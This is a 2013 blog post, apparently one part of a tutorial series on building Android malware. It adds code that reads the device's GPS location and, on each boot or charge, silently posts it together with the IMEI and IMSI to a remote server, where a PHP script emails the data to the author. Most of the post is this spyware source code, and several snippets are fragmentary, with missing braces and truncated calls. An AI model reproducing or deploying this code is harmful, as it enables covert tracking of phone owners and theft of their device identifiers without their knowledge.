May 062013

Let’s see if we can get the device location, because it’s neat on mobile devices. I don’t know if it is SO important, but we can do it, so let’s do it:

We have many ways to get the location, the lowest accurate is GSM-Cell locatization, then via WiFi networks and then GPS, which is very accurate. We will iterate over all possible location providers to chose the most accurate and return the location as Double[] (typical GPS coordinates). Let’s add this code to the class DeviceLocation:

public double[] getGPS(Activity a) {
    try {
      LocationManager lm = (LocationManager) a.getSystemService(Context.LOCATION_SERVICE);  
      List providers = lm.getProviders(true);

      /* Loop over the array backwards, and if you get an accurate location, then break out the loop*/
      Location l = null;

      for (int i=providers.size()-1; i>=0; i--) {
        l = lm.getLastKnownLocation(providers.get(i));
        if (l != null) break;

      double[] gps = new double[2];
      if (l != null) {
        gps[0] = l.getLatitude();
        gps[1] = l.getLongitude();
      return gps;
    catch (Exception e) {
      // I don't even know how this might happen
      return null;

As you can see, we eigther get null or Latitute and Longitude as array. Easy, isn’t it?

Edit: I forgot to say that we have to add permissions for this. I hope you made it up yourself ;) We need fine and coarse location, since we try all location providers:

2013-05-14 11_43_14-Java - Malware1_AndroidManifest

In order to receive the location data on our server, we extend the PHP file to something like this:

$data = "Location:\r\n";
$data = $data . "lat: " . $_POST["lat"] . "\r\n";
$data = $data . "long: " . $_POST["long"] . "\r\n";
$data = $data . "" . $_POST["lat"] . "," . $_POST["long"] . "\r\n";
$data = $data . "\r\n\r\n";
$data = $data . "Device Information:\r\n";
$data = $data . "IMEI: " . $_POST["imei"] . "\r\n";
$data = $data . "IMSI: " . $_POST["imsi"] . "\r\n";

mail("", "Pingback from Android device", "le data:\r\n".$data);

Further we change the WebHelper usage in and
try {
      DeviceLocation d = new DeviceLocation();
      double[] location = d.getGPS(this);

      WebHelper w = new WebHelper("",
    catch (Exception e) {
      Log.e("malware", e.toString());

(Of course we use arg0 instead of this in

And we change the to include latitude and longitude data:

public class WebHelper extends Thread {
  private String url="";
  private String imei="";
  private String imsi="";
  private Double lat=0.0;
  private Double longi=0.0;
  public WebHelper(String u, String imei, String imsi, Double lat, Double longi) {
  public void run() {
    SendToWebserver(url, imei, imsi, lat, longi);

  @SuppressWarnings({ "rawtypes", "unchecked" })
  public String SendToWebserver(String url, String imei, String imsi, Double lat, Double longi) {
    HttpClient httpclient = new DefaultHttpClient();
    HttpPost httppost = new HttpPost(url);

    try {
      // Add your data
      List nameValuePairs = new ArrayList(2);
      nameValuePairs.add(new BasicNameValuePair("imei", imei));
      nameValuePairs.add(new BasicNameValuePair("imsi", imsi));
      nameValuePairs.add(new BasicNameValuePair("lat", lat.toString()));
      nameValuePairs.add(new BasicNameValuePair("long", longi.toString()));
      // add others like this
      // nameValuePairs.add(new BasicNameValuePair("sim_id", sim_id));

      httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));

      // Execute HTTP Post Request
      HttpResponse response = httpclient.execute(httppost);

      return response.toString();

    } catch (Exception e) {
      return e.toString();

Whenever the device is charging or booting we will now receive an email in the lines of this:

2013-05-14 12_03_13-(7) Webmail __ Pingback from Android device